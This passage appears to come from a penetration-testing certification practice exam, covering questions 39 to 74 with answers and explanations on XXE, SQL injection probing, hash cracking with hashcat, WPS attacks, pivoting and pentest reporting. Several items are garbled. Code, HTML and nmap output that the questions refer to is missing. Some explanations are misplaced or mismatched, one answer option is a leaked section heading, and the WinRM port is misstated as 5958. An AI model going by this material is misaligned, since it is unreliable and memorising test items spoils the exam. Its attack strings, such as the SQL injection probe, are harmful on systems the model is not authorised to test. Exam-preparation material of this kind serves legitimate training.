D.Prevent guessing/brute-force attacks

Answer 39

D.Prevent guessing/brute-force attacks

Explanation
Correct Answer: Prevent guessing/brute-force attacks is correct. An insecure direct object reference (IDOR) inadvertently reveals what a web application is actually doing. This is not a vulnerability per se however, an attacker may be able to infer as to what the application is doing behind the scenes, such as retrieving or manipulating a database record. If the attacker cannot infer what the request is doing, the task of guessing or brute-forcing web requests is more challenging.

Incorrect Answers: Stop an attacker from exfiltrating sensitive data from an application or database is incorrect because obfuscating the IDOR parameter will not prevent an attacker from exfiltrating sensitive data from an application or database; it will only increase the difficulty of the task.

Prevent the parameter from being injectable is incorrect because obfuscation hides something; it doesn’t fix a security issue, such as a parameter being susceptible to an injection attack.

Provide access controls for the web application is incorrect because obfuscation does not provide access controls to the web application; it only hides what is actually there.

Question 40

During an engagement, the customer has requested that you throttle your active scanning techniques against specific legacy network components. Which of the following options might have caused the customer to have concern about scanning of its legacy assets? (Choose two.)
A.Service interruptions
B.Limited number of users on network
C.Low-bandwidth connections
D.They are not managed by the organization

Answer 40

A.Service interruptions
C.Low-bandwidth connections

Explanation
Correct Answers: Low-bandwidth connections and service interruptions are correct. Organizations that are operating legacy networks may have low-bandwidth connections, which are at greater risk of service interruption when scanning.

Incorrect Answers: They are not managed by the organization is incorrect because the customer has not stated that you can’t target the legacy assets, but rather has just requested that you throttle the scan activity against the legacy assets.

Limited number of users on a network is incorrect because the customer did not share any concern regarding users on the legacy networks, as that constraint would likely have applied to other parts of the network as well in regard to scanning.

Question 41

After successfully compromising user credentials on a Linux workstation, you would like to run Mozilla Firefox back to your attack host so that you can browse web content that is only available from intranet web servers within the local network. Which option would help facilitate the connectivity over a secure channel?
A.Telnet to the host and use ‘setenv DISPLAY’ back to the attack host
B.Execute ‘xhost+’ on your attack host, then use ‘ssh -x’ to connect to the target host and launch Firefox
C.Use ‘ssh -vv’ to the target host and launch Firefox
D.Ensure X11 forwarding is enabled and support on the target host and your attack host, then use ‘ssh-x’ to connect the target host and then launch Firefox

Answer 41

D.Ensure X11 forwarding is enabled and support on the target host and your attack host, then use ‘ssh-x’ to connect the target host and then launch Firefox

Explanation
Correct Answer: Ensure X11 forwarding is enabled and supported on the target host and your attack host, then use ssh -X to connect the target host, and then launch Firefox is correct. The X Window System (or X11) provides a basic framework that supports a graphical user interface (GUI) environment for Unix/Linux operating systems. The SSH server running on both the target host and the attack host need to have X11 forwarding enabled before you can use ssh with the -X option to allow Firefox, which is a GUI application to display back on your attack host.

Incorrect Answers: Telnet to the host and use setenv DISPLAY back to the attack host is incorrect because Telnet is not a secure protocol.

Execute xhost+ on your attack host, then use ssh -x to connect to the target host and launch Firefox is incorrect both because xhost+ is no longer needed when X11 forwarding is enabled on the target and because the -x (lowercase) option is not the valid flag for enabling X11 applications over SSH. Use ssh -vv to the target host and launch Firefox is incorrect because the -vv option is used to set the level of log verbosity for SSH.

Question 42

The following code was used to exploit a target web server during a pentest. What type of attack did this exploit take advantage of?``` ]> &xxe; mypass```
A.RFI
B.XXE Injection
C.Path traversal attack
D.LFI

Answer 42

B.XXE Injection

Explanation
Correct Answer: XXE injection is correct. The XML code takes advantage of the `Expect()` module to execute commands (XXE injection) against the web server.

Incorrect Answers: Path traversal attack is the incorrect because the XML code does not traverse through the local file system or web root of the web server.

RFI is the incorrect because the XML code is not reaching out to a malicious web page or application to execute remote code.

LFI is incorrect because the XML code is not including files; it’s executing system commands.

Question 43

Communication triggers are important indicators of when the pentester (or pentest team) should reach out to the customer. Which of the following examples could trigger a conversation with the customer? (Choose two.)
A.Using tools or methodologies not documented in the RoE
B.Using SQLmap against a production database server when the risk or outcome is unknown
C.Executing a command injection vulnerability in a customers non production environment that is in scope for the pentest
D.Running a port scan against a legacy network that was already documented in the RoE

Answer 43

A.Using tools or methodologies not documented in the RoE
B.Using SQLmap against a production database server when the risk or outcome is unknown

Explanation
Correct Answers: Using SQLmap against a production database server when the risk or outcome is unknown and using tools or methodologies not documented in the RoE are correct. Communication triggers are important indicators of when the pentester (or pentest team) should reach out to the customer. A few of those indicators include critical findings, completing certain stages (testing activities or milestones) in the engagement, embarking on a potentially risky test (for example, executing a potential SQL injection against a production web application), indicators of prior compromise, and using tools or methodologies not documented in the RoE.

Incorrect Answers: Executing a command injection vulnerability in a customer’s non-production environment that is in scope for the pentest is incorrect because the customer’s non-production environment is in scope for the assessment, and executing a command injection against a non-production environment will have little impact on the organization. Customers with this type of environment would prefer the pentester to run a test against non-production assets to evaluate the impact, rather than testing in a production environment where, if something goes wrong, bad things could happen.

Running a port scan against a legacy network that was already documented in the RoE is incorrect because the legacy network was already documented in the RoE, so the customer assumes the risk of the port scan, as this would be an approved methodology in the RoE in order to evaluate the network attack surface.

Question 44

During a pentest, your team successfully exploited an external-facing vulnerability and obtained user-level privileges on the customer’s internal network. From there, your team successfully compromised the NTLM password hash for the local system administrator account but couldn’t crack the hash. What remediation guidance would you offer to the customer as part of the post-exploitation testing narrative in the pentest report?
A.Inform the customer they are following good password security practices
B.Don’t change password since the plaintext value of the hash was not recovered
C.Ask the customer for the password to verify password complexity requirements
D.Consider the password and hash compromised and change the password regardless

Answer 44

D.Consider the password and hash compromised and change the password regardless

Explanation
Correct Answer: Consider the password and hash compromised and change the password regardless is correct. Given enough time and resources, the password could be cracked. The offline attack could take 180 days, at which point the password might no longer be valid, or it could take one day. Depending on the configuration of the Windows network, the NTLM hash could also be replayed over the network, using pass-the-hash (PtH) lateral movement technique, and because the hash is for an administrator account, it could increase the impact level of further compromise.

Incorrect Answers: Don’t change password since the plaintext value of the hash was not recovered is incorrect because that is a decision the customer should make, not the pentester. The customer can take the proper course of action based on their risk appetite, but a pentester’s responsibility is to report the facts from the engagement.

Inform the customer they are following good password security practices is incorrect because the customer may be following good password security practices; however, knowing the plaintext value of the password is only part of the issue. If an attacker could replay the NTLM hash over the network, they may be able to install/leverage additional tools on other hosts (such as Mimikatz to recover plaintext passwords from memory), and then the hash is no longer needed.

Ask the customer for the password to verify password complexity requirements is incorrect because the password policy could be verified for password complexity requirements, not the plaintext password.

Question 45

During a pentest, you identify a wireless access point that is configured to use a WPA2 PSK as well as WPS. Why would you want to use a tool like Reaver to attack WPS instead of attempting to capture the four-way handshake from a wireless client using the Aircrack-ng utilities and then crack the PSK offline?
A.You should not use Reaver to recover the WPS PIN when you can recover the PSK, as it is trivial to recover the plaintext value of the PSK using the four-way handshake and a simple dictionary
B.Reacer attacks a WPS implementation weakness in the registrar, however, the PSK can be recovered if Reaver can recover the four-way handshake
C.Reaver can be used to attack weaknesses in WPS and is capable of recovering the PSK through offline attacks
D.IF you can recover the WPS PIN, the router will give you plaintext value of the PSK. If the PSK is a strong password, it may take awhile to crack offline

Answer 45

D.IF you can recover the WPS PIN, the router will give you plaintext value of the PSK. If the PSK is a strong password, it may take awhile to crack offline

Explanation
Correct Answer: If you can recover the WPS PIN, the router will give you the plaintext value of the PSK. If the PSK is a strong password, it may take a while to crack offline is correct. Reaver attacks a WPS implementation weakness in the registrar functionality, where it only takes 11,000 attempts to guess the correct WPS PIN. Attacking WPS to get the PIN can help speed up the process of recovering the plaintext value of the PSK. In the event the router is not susceptible to a WPS PIN attack, an attack to recover the 4-way handshake may be warranted.

Incorrect Answers: Reaver attacks a WPS implementation weakness in the registrar; however, the PSK can be recovered if Reaver can recover the four-way handshake is incorrect because Reaver does not support features to recover the four-way handshake during the wireless authentication process.

Reaver can be used to attack weaknesses in WPS and is capable of recovering the PSK through offline attacks is incorrect because Reaver does not support offline attack capabilities to recover the plaintext value of the PSK.

You should not use Reaver to recover the WPS PIN when you can recover the PSK, as it is trivial to recover the plaintext value of the PSK using the four-way handshake and a simple dictionary is incorrect because the PSK can be of any length and difficult to crack using just a simple dictionary. Recovering the plaintext value of the PSK may require additional time and computing resources.

Question 46

In the statement of work (SOW) document, the scope of work defines which of the following?
A.TImeline for the pentest
B.Reason for the pentest
C.Pentest artifacts
D.Work activities to be completed

Answer 46

D.Work activities to be completed

Explanation
Correct Answer: Work activities to be completed is correct. The scope of work defines the work activities (objectives) to be completed. The scope is necessary so that the pentest team knows prior to testing what will be involved during the engagement, such as if travel is required, and which particular attack vectors or methodologies the organization would like to have tested.

Incorrect Answers: Pentest artifacts is incorrect because the pentest artifacts are captured in the pentest report.

Timeline for the pentest is incorrect because the SOW period of performance specifies the timeline for the project.

Reason for the pentest is incorrect because the SOW purpose defines the reason for the pentest.

Question 47

During the active scanning phase of the internal PCI DSS pentest, you discover a Windows XP SP1 host on the customer's legacy network, which looks to be part of the point-of-sale system. Which of the following Microsoft (MS) bulletins are applicable to the Windows XP SP1 operating system, that are susceptible to vulnerabilities you could likely exploit remotely against the target to get a SYSTEM-level shell? (Choose two.)
A.MS06-040
B.MS10-087
C.MS08-067
D.MS10-092

Answer 47

A.MS06-040
C.MS08-067

Explanation
Correct Answers: MS06-040 and MS08-067 are correct. MS06-040 and MS08-067 document an unauthenticated vulnerability in older Microsoft operating systems, like XP SP1, that can be exploited remotely to execute arbitrary code with SYSTEM privileges.

Incorrect Answers: MS10-092 is incorrect because the MS10-092 documents a vulnerability with the Windows Task Scheduler that allows for local privilege escalation.

MS10-087 is incorrect because MS10-087 documents a vulnerability in Microsoft Office that is remotely exploitable but would only provide user-level privileges.

Question 48

During a pentest, you are able to establish a foothold in the customer’s network on a Linux host inside the DMZ, behind the external firewall. You want to set up a SOCKS connection using SSH and Proxychains to do TCP and UDP scanning from the compromised Linux host. What type of proxy should you use in this scenario?

A.SOCKS4
B.SOCK PROXY
C.SOCKS4a
D.SOCKS5

Answer 48

D.SOCKS5

Explanation
Correct Answer: SOCKS5 is correct. A SOCKS5 proxy will allow you to use both TCP and UDP protocols. All versions of SOCKS servers allow for TCP connectivity, but only version 5 supports the ability to relay UDP packets to remote hosts over the SOCKS connection and receive UDP responses through the proxy server.

Incorrect Answers: SOCKS4 and SOCKS4a are incorrect because SOCKS 4 and SOCKS 4a (extension of SOCKS 4) only support TCP connections.

SOCK PROXY is incorrect because SOCK PROXY is not a valid proxy type.

Question 49

During an ICMP discovery scan on the customer's LAN, you find that the target hosts are not responding, which could be due to the local Windows firewall settings on the hosts. Which of the following nmap command options could you use to aid in the discovery of hosts on the LAN? (Choose three.)
A.-Pn'
B.'-sU"
C.'-sL'
D.'-sS'

Answer 49

A.-Pn’
B.’-sU”
D.’-sS’

Explanation
Correct Answers: -Pn’, ‘-sS’, and ‘-sU’ are correct.

Incorrect Answers: The -Pn option disables the host discovery option within Nmap and treats all hosts as alive, -sS will conduct a port scan against TCP ports, and -sU will conduct a port scan against UDP ports.’-sL’ and “All of the answers…” are incorrect. The -sL option is used to list targets to scan, based on what is supplied in the input. If a subnet is provided (for example, 192.168.1.0/24), Nmap will print the IP addresses in that range. “All of the answers…” is incorrect as not all of the answers are correct.

Question 50

A JTAG can be used for which of the following?
A.Jailbreaking
B.Rooting Android devices
C.Debugging embedded devices
D.Application debugging

Answer 50

C.Debugging embedded devices

Explanation
Correct Answer: Debugging embedded devices is correct. A JTAG is used for debugging embedded devices (hardware).

Incorrect Answers: Application debugging, jailbreaking, and rooting Android devices are incorrect because they are software related, not hardware.

Question 51

During a pentest, you successfully recover NTLM hash values for most of the users in an Active Directory domain; however, you are unable to execute PtH attacks due to environmental restrictions. Therefore, you decide to use the `hashcat` utility to crack the hashes offline. Which `hashcat` mode will you use to crack the hashes?
A.'-m 0'
B.'-m 1000'
C.'-m 300'
D.'m 2500'

Answer 51

B.’-m 1000’

Explanation
Correct Answer: -m 1000’ is correct.

Incorrect Answers: The hash mode for NTLM in hashcat is represented as 1000.’-m 2500’ is incorrect because that hash mode is for WPA.

Answer ‘-m 300’ is incorrect because that hash mode is for LANMAN hash values.

‘-m 0’ is incorrect because that hash mode is for MD5 hash values.

Question 52

Company ABC has asked you to simulate the behavior of an individual who has authorized access to the company's network. Which type of threat actor is the company referring to?
A.Hacktivist
B.Advanced Persistent Threat
C.Insider threat
D.Script kiddie

Answer 52

C.Insider threat

Explanation
Correct Answer: Insider threat is correct. The insider threat would simulate the attack behavior of a user or privileged user operating from within the company’s network. For example, this type of testing can help an organization better understand valid attack vectors or the attack surface of the network given user-level access to the network.

Incorrect Answers: Hacktivists, script kiddies, and advanced persistent threats (APTs) are typically external threat actors, with minimal knowledge of a company compared to an insider threat.

Question 53

A long-running, persistent mechanism that can run as a background process on a target Linux server is known as what?
A.Script
B.Executable
C.Daemon
D.Cronjob

Answer 53

C.Daemon

Explanation
Correct Answer:Daemon is correct. A daemon is a long-running program that is typically started at boot or when an application is launched from a terminal window, and runs as a background process rather than under the direct control of an interactive user.

Incorrect Answers: Script is incorrect because a script is not considered a long-running, persistent program, as it executes under the control of an interactive user or process, such as a cronjob, but terminates after it completes its associated tasks.

Executable is incorrect because an executable is a program by itself unless it is started by a user or a process.

Cronjob is incorrect because a cronjob is not long running; it will execute and terminate within a certain period of time.

Question 54

During a pentest, you discover users and admins are following poor password-generation practices on the domain, such that passwords are either guessable or subject to dictionary attacks. Which of the following BEST describes the appropriate remediation guidance for the customer?
A.Moving to using 2FA or RADIUS to reduce the risk of passwords getting compromised
B.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain
C.Incoporate a stronger password complexity policy on the domain
D.Provide training to improve oversight of and compliance with organizational password policy requirements

Answer 54

B.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain
Explanation
Correct Answer: Change passwords for all users and admins after enforcing a new password complexity requirement on the domain is correct. Recommending that a new password complexity requirement be enforced on the domain is essential, as most of the passwords for both admin and user accounts were susceptible to dictionary-based attacks. Then, having all of the users and admins change their passwords after password complexity has been enforced on the domain will help ensure passwords adhere to the new organizational requirement.

Incorrect Answers: Incorporate a stronger password complexity policy on the domain is incorrect because incorporating stronger password policy on the domain is only part of the solution. Users and admins need to change their passwords so the new policy can take effect.

Provide training to improve oversight of and compliance with organizational password policy requirements is incorrect because providing training to improve oversight and compliance or organizational password policy requirements is good, but it doesn’t help enforce a technical control to resolve passwords susceptible to dictionary-based attacks.

Move to using 2FA or RADIUS to reduce the risk of passwords getting compromised is incorrect because it introduces a solution where the gains do not balance the complexity of implementation for all domain accounts.

Question 55

The SOW includes information pertaining to all EXCEPT which of the following subjects?
A.Scope of work
B.Period of performance
C.Allocation of risk
D.Location of work

Answer 55

C.Allocation of risk

Explanation
Correct Answer: Allocation of risk is correct. The allocation of risk is a provision within the master service agreement (MSA) that defines levels of responsibility between each party.

Incorrect Answers: Location of work is incorrect because the SOW includes where exactly the work activities are to be performed.

Period of performance is incorrect because the timeline for the project is essential to include in the SOW so that the vendors providing the service and the customer receiving the service can plan for each activity accordingly.

Scope of work is incorrect because the scope of the work to be completed is needed so both the vendor and the customer can agree on the expectations for the project.

Question 56

During a pentest, you were successful with gaining remote user-level access to a Windows 10 host on the ABC Active Directory domain. The customer utilizes sophisticated intrusion detection capabilities. Part of the RoE suggests utilizing attack techniques that might go undetected. Which of the following would be the BEST choice when carrying out additional attacks from the compromised host?
A.Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the intrusion detection capabilities are configured
B.Copy tools such as pwdump.exe and ncat.exe over to a staging area on the local file system and start planning an attack strategy
C.Establish a foothold on the target using the Empire framework, in order to further exploit the Active Directory domain
D.Use msfvenom to generate a Meterpreter payload for the compromised target then copy over to the local file system and execute the payload to get a reverse encrypted shell to use for interacting with the target

Answer 56

A.Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the intrusion detection capabilities are configured

Explanation
Correct Answer: Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the intrusion detection capabilities are configured is correct. Given the current scenario, it is unknown how sophisticated the customer’s defense capabilities are. Gaining situational awareness is a critical step in the post-exploitation phase and can help a pentester gather important knowledge of the host and internal network. Once you know how the system and environment are configured, you can start planning your next position of attack, such as if an exploitation framework is safe to use, which exploits or attacks could trigger unnecessary alarms/alerts on the network, and so on.

Incorrect Answers: Copy tools such as pwdump.exe and ncat.exe over to a staging area on the local file system and start planning an attack strategy is incorrect because there is not enough information provided to determine if those actions can support post-exploitation capabilities without being detected.

Use msfvenom to generate a Meterpreter payload for the compromised target, then copy over to the local file system, and execute the payload to get a reverse, encrypted shell to use for interacting with the target is incorrect because putting unnecessary executables or exploits on a local file system could trigger the antivirus software. It may not quarantine the files, but it could send an alert of a potentially unwanted program (PUP).

Establish a foothold on the target using the Empire framework, in order to further exploit the Active Directory domain is incorrect because it is best to wait until you gain situational awareness of the environment and surroundings before carrying out an attack strategy without a well-thought-out plan.

Question 57

During a pentest, you discover that the customer's web application logic that is used to manage user information is flawed. When a user creates an account in the application, the application writes out a file to the local operating system. The information from the file is parsed in near-real time by another process that auto-generates the effective unique user ID and privileges for that user. The programming logic sleeps for two seconds during the parsing process, which could be enough time for an attacker to modify the file to cause a DoS or possibly execute privileges on the system. What is the type of vulnerability described in this scenario best known as?
A.SQLi
B.Race condition
C.Privilege escalation
D.Command injection

Answer 57

B.Race condition

Explanation
Correct Answer: Race condition is correct. A race condition is a type of behavior where the output is dependent on the sequence or timing of other uncontrollable events. It can become a vulnerability when events do not happen in the order the programmer intended or when unexpected events happen during the intended sequence.

Incorrect Answers: Privilege escalation is incorrect because privilege escalation is a result of exploiting a vulnerability, not the action.

Command injection and SQLi are incorrect because command injection and SQL injection vulnerabilities are a result of not validating input data.

Question 58

How much risk the organization is willing to tolerate in order to achieve its goals is considered what?
A.Goal reprioritization
B.Risk appetite
C.Risk avoidance
D.Risk rating

Answer 58

B.Risk appetite

Explanation
Correct Answer: Risk appetite is correct. Every organization has its own level of risk appetite, which is how much risk (that is, the threshold) the organization is willing to tolerate in order to achieve its goals.

Incorrect Answers: Risk avoidance is incorrect because risk avoidance is the action an organization would follow depending on how much risk they are willing to take on (risk appetite). An example would be a healthcare provider looking to install a new business automation application to increase productivity for their employees when entering in customer medial records, but after further debate, the organization determines not to install the application as the security team identifies major security bugs in the software that could be exploited and cause a major security incident.

Goal reprioritization in incorrect because goal reprioritization is used to readjust priorities based on impact.

Risk rating is incorrect because risk rating helps organizations prioritize remediation efforts and aids the organization in quantifying the appropriate risk level for a given risk.

Question 59

During a pentest, you find numerous Windows workstations and servers susceptible to known kernel-level operating system vulnerabilities. Which of the following remediation strategies could you recommend for this scenario? (Choose two.)
A.All of the answer choices are correct
B.Configure a centralized patch management solution
C.Ensure systems are PCI compliance
D.Install missing patches

Answer 59

B.Configure a centralized patch management solution
D.Install missing patches

Explanation
Correct Answers: Install missing patches is correct because kernel-level operating system vulnerabilities are mitigated by the vendor (in this case, Microsoft) through a patch.

Configure a centralized patch management solution is correct because a centralized patch management solution (for example, Microsoft WSUS) could help facilitate management and deployment of Microsoft patches/updates for the Windows environment.

Incorrect Answers: Ensure systems are PCI compliant is incorrect because the scenario does not state that the customer is responsible for meeting payment card industry (PCI) requirements.

“All of the answer choices are correct” is incorrect because not all of the answers were correct.

Question 60

Given the following HTML source code, what is known about the web login page? (Choose three.)

Username: <br>Password: <br>

A.The password field length is defined, which can be used to developed rules for brute-force attacks for the login page
B.The username field length is defined, which can be used to develop rules for brute-force attacks to the login page
C.The HTTP method used to submit from data to the web server is a PUT request
D.The default username and password are exposed

Answer 60

A.The password field length is defined, which can be used to developed rules for brute-force attacks for the login page
B.The username field length is defined, which can be used to develop rules for brute-force attacks to the login page
D.The default username and password are exposed

Explanation
Correct Answers: The default username and password are exposed is correct because the default credentials are exposed in the comments of the HTML source code. The username field length is defined, which can be used to develop rules for brute-force attacks for the login page and The password field length is defined, which can be used to develop rules for brute-force attacks for the login page are correct because the field lengths are predefined and can help stage brute-force attacks against the login page, now that you know the length of the passwords and username cannot exceed a certain value.

Incorrect Answer: The HTTP method used to submit form data to the web server is a PUT request is incorrect because the HTTP method used to submit the form data is a POST request, not a PUT, as defined in the HTML source code.

Question 61

During a pentest, you discover that your testing efforts locked out some of the user accounts on the system. Which communication strategy can you use to help notify proper personnel?
A.Escalation path
B.Call tech support
C.Email your project lead
D.Email executive management

Answer 61

A.Escalation path

Explanation
Correct Answer: Escalation path is correct. The escalation path can be used for remediating issues that arise during a pentest.

Incorrect Answer:Email executive management is incorrect because members of executive management are unlikely to understand the technical issues regarding a pentest.

Call tech support is incorrect because tech support may be unaware of the pentest and be really confused as to why you are reporting account lockouts.

Email your project lead is incorrect because emailing your project lead may or may not be part of the approved escalation path.

Question 62

How often are external vulnerability scans required to run against PCI vendors?
A.Quarterly
B.Annually
C.Semi-monthly
D.Monthly

Answer 62

A.Quarterly

Explanation
Correct Answer: Quarterly is correct. PCI DSS vulnerability scanning is required quarterly (or every three months).

Incorrect Answers: The other choices are incorrect because PCI DSS vulnerability scanning is required quarterly. However, PCI DSS penetration testing is required at least annually.

Question 63

During a pentest, you discover a command injection vulnerability in the web application. Which of the following would you recommend to your customer to resolve the issue?
A.Apply the appropriate OS hardening
B.Use a customer error page
C.Use a firewall to filter IP addresses
D. Sanitize and validate user-supplied input

Answer 63

D. Sanitize and validate user-supplied input

Explanation
Correct Answer: Sanitize and validate user-supplied input is correct. Command injection occurs when a user or process enters system-level commands in a user-supplied input field, such as a URL parameter in an HTTP POST request that executes against the application’s underlying operating system when the input is not validated.

Incorrect Answers: Use a custom error page is incorrect because a customer error page is used to report on an exception, not catch the exception, such as in the case of user-input validation. That part requires additional programming logic to decipher what is and is not appropriate to be processed by the application.

Apply the appropriate OS hardening is incorrect because the vulnerability is within the application, not the operating system.

Use a firewall to filter IP addresses is incorrect because a firewall can help limit the attack surface but not remediate the actual vulnerability.

Question 64

During a web vulnerability assessment, you use the sequencer feature in Burp Suite to evaluate the web application’s ability to generate secure session tokens. Why should session tokens that are used for authentication be randomized? (Choose two.)
A.To prevent session-hijacking attacks
B.To protect against predictable session tokens
C.To prevent forced browsing attacks
D.To defend against clickjacking attacks

Answer 64

A.To prevent session-hijacking attacks
B.To protect against predictable session tokens

Explanation
Correct Answers: To protect against predictable session tokens is correct because the lack of randomness with session tokens will make an attacker’s life easy when attempting to recover an existing, valid session with the web application. To prevent session-hijacking attacks is correct because if the session token can be predicted, it can be replayed (hijacked) and the identity of the user would be compromised.

Incorrect Answers: To prevent forced browsing attacks is incorrect because forced browsing is a result of the web application/server’s authentication scheme being inconsistent, and would allow for an unauthenticated user to access a portion of a restricted web site/application due to lack of access control.

To defend against clickjacking attacks is incorrect because session tokens do not defend against clickjacking attacks. These types of attacks are difficult to prevent in the browser, as most of the functions are controlled on the client side.

Question 65

During a pentest, your team is having issues running a root setuid program on an NFS file system in a directory named /share. The permissions on the executable are 4777. What is the likely cause of the problem?
A.The setuid flag is missing on the program
B.The NFS share is mounted with the nosuid option
C.Your team is not executing the program using the full path
D.The program is missing the executable flag

Answer 65

B.The NFS share is mounted with the nosuid option

Explanation
Correct Answer: The NFS share is mounted with the nosuid option is correct. An NFS file share configured to mount with the nosuid option will prevent executables on the share from executing with the privileges of the program owner. This is a security feature to defend against using NFS to facilitate privileged escalation attacks on the local operating system.

Incorrect Answers: The program is missing the executable flag is incorrect because the permission on the setuid program has the executable flag set with 777.

The setuid flag is missing on the program is incorrect because the setuid bit is set with the 4 in the 4777 permission setting.

Your team is not executing the program using the full path is incorrect because the full path of the executable is not needed when you are executing the program in the directory in which it resides.

Question 66

During a compliance scan of a customer’s Apache HTTP server, you discover the following in the http.conf file. What is a potential concern given the output of the compliance scan?

Order Deny, Allow Deny from all Allow from all

A.The HTTP server is configured to allow anyone to access, what looks to be a sensitive part of the web server, which warrants further discussion with the customer
B.The HTTP server is configured correctly, and there is no call for concern
C.The HTTP server contains a sensitive directory that needs to be protected
D.The HTTP server is configured to deny all, which would restrict access for valid users

Answer 66

A.The HTTP server is configured to allow anyone to access, what looks to be a sensitive part of the web server, which warrants further discussion with the customer

Explanation
Correct Answer: The HTTP server is configured to allow anyone to access, what looks to be, a sensitive part of the web server, which warrants further discussion with the customer is correct. The sensitive directory is open and exposed and allows access from anywhere. This is a concern as unauthorized individuals may have access to sensitive data in that location.

Incorrect Answers: The HTTP server is configured to deny all, which would restrict access for valid users is incorrect because the “allow all” clause in the configuration would permit access to the valid users who are supposed to be using the website.

The HTTP server contains a sensitive directory that needs to be protected is incorrect because the directory is named “sensitive,” but it may not have any sensitive data at all. Further investigation is warranted before drawing any final conclusions.

The HTTP server is configured correctly, and there is no call for concern is incorrect because the result of the compliance scan does show a potential for concern, given the name of the directory. Without discussing the results with the customer and validating the contents of the web directory, you cannot say for certain that there is no call for concern.

Question 67

Critical findings in a pentest report are likely to have \_\_\_\_\_\_\_\_\_\_\_\_\_\_ on a customer network.
A.a medium impact
B.a low impact
C.no impact
D.a high impact

Answer 67

D.a high impact

Explanation
Correct Answer: A high impact is correct. Critical finding will have a high impact on the network, based on certain environmental factors such as the sophistication of the exploit and how it affects the confidentiality, integrity, and availability of the system/network.

Incorrect Answers: Low impact is incorrect because low-impact findings are rated with a low severity level.

Medium impact is incorrect because medium-impact findings are rated with a medium severity level.

No impact is incorrect because there are no findings that should be categorized with a no impact level of severity.

Question 68

An unauthorized individual, who has made up a false story, has followed an authorized employee through a restricted entry way, and the authorized employee consented to letting the unauthorized individual in. What type of social engineering attack does this describe?
A.Authentication bypass
B.Piggybacking
C.Tailgating
D.3.0 Attacks and Exploites

Answer 68

B.Piggybacking

Explanation
Correct Answer: Piggybacking is correct. Piggybacking is the technique used by an intruder to gain unauthorized access to a secure location by walking in through the door behind an authorized employee with legitimate access who consents to the access.

Incorrect Answers: Authentication bypass is incorrect because an authentication bypass is when the security mechanism (software or hardware) enforcing the access control can be defeated without using the proper credential (i.e., password, key, badge ID, etc.).

Tailgating is incorrect because tailgating is when an unauthorized individual gains access to a restricted area by following directly behind an authorized employee with legitimate access, as in piggybacking, but tailgating occurs without the knowledge or consent of the authorized employee.

3.0 Attacks and Exploites is incorrect because phishing is a social engineering technique targeting users via email, SMS, or phone.

Question 69

A type of file used to support a dictionary-based attack is often referred to as a \_\_\_\_\_\_\_.
A.Hash table
B.Source code
C.Word list
D.Rainbow table

Answer 69

C.Word list

Explanation
Correct Answer: Word list is correct. A word list is used to compile a list of potential passwords that could be used during a dictionary attack.

Incorrect Answers: Rainbow table is incorrect because a rainbow table is used to compute hashes, not passwords.

Source code in incorrect because source code is not a list of commonly used words and phrases; instead, it contains code used to run a computer program.

Hash table is incorrect because a hash table is similar to a rainbow table, such that it is used to compute hashes, not for common words or phrases that could be used as a password.

Question 70

During a pentest your customer asks you to review a log entry from a target web server, as the malicious traffic appears to originate from one of your team's authorized IPv4 addresses. The log file shows the following:```GET /info.php?id=1%20AND%201=1 HTTP/1.1 200```What is your team member likely testing for?
A.XSS
B.SQL Injection
C.CSRF
D.Command injection

Answer 70

B.SQL Injection

Explanation
Correct Answer: SQL injections is correct. The AND operator is passed in the URL to generate a true statement to see if the application is vulnerable to a SQL injection attack. URL encoding (%20) is used for white spaces in the URL request.

Incorrect Answers: Command injection is incorrect because the request was not using a command such as cat, ls, id, etc., as the value of the parameter is used to reference a record in the database.

XSSS is incorrect because the log entry does not have any JavaScript code in the parameter, which is a characteristic of a cross-site scripting (XSS) attack.

CSRF is incorrect because there was no attempt to exploit a cross-site request forgery (CSRF) in the web request.

Question 71

By default, what type of queries will a Windows host send over the network if it cannot resolve the host name through DNS? (Choose two.)
A.ARP
B.ICMP
C.LLMNR
D.NBNS

Answer 71

C.LLMNR
D.NBNS

Explanation
Correct Answer: LLMNR and NBNS are correct. In the event that a Windows host cannot resolve the WPAD (web proxy auto-discovery protocol) server host name through DNS, it will send Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBNS) queries over the network by default; however, this can be disabled/changed.

Incorrect Answers: ARP is incorrect because the Address Resolution Protocol (ARP) is used for resolving an IP address to a MAC address.

ICMP is incorrect because the Internet Control Message Protocol (ICMP) is used for communicating with hosts over the network and sending error messages and other operational information regarding services over the network.

Question 72

During a pentest, your team has asked you to help fingerprint the operating system of a target. Given the following nmap scan results, what is the most likely operating system for the target?
A.macOS
B.Windows
C.Unix
D.None of the answer choices are correct

Answer 72

B.Windows

Explanation
Correct Answer: Windows is correct. The nmap port scan results show ports 135/tcp, 139/tcp, and 445/tcp open, based on the SYN-ACK response from the target. These ports are attributed to NetBIOS and the host is most likely running a Microsoft Windows operating system.

Incorrect Answers: Unix is incorrect because there are no services to attribute to the Unix operating system, such as 22/tcp (SSH).

macOS is incorrect because the host does not appear to be running a version of macOS, especially if NetBIOS ports are returning during the port scan.

“None of the answers…” is incorrect because at least one answer was correct, which is Windows.

Question 73

During a pentest, you find that the customer’s production environment’s Windows servers all had WinRM enabled, which helped facilitate additional attacks against the network with no restriction. What mitigation strategy would you provide?
A.All of the answer choices are correct
B.Disable the service if not necessary
C.Lock down WinRM to only trusted hosts on the network
D.Apply an ACL in WIndows Firewall to restrict access to port 5958/tcp to authroized IP addresses

Answer 73

A.All of the answer choices are correct

Explanation
Correct Answer: All of the answers are correct. All of the answers can provide an effective strategy to mitigate the weakness. The biggest issue with the scenario is that the trust relationship was not defined (who is authorized to execute services remotely), thus allowing unrestricted execution within the network.

Incorrect Answers: All of the other choices are incorrect as individual responses . They all provide an effective mitigation strategy for the weakness described in the scenario, making all answers the correct choice.

Question 74

A broadcast storm is caused by \_\_\_\_\_\_\_\_\_\_\_\_\_\_.
A.Loops in the network
B.Root bridge election
C.Double tagging
D.Expired TTL value

Answer 74

A.Loops in the network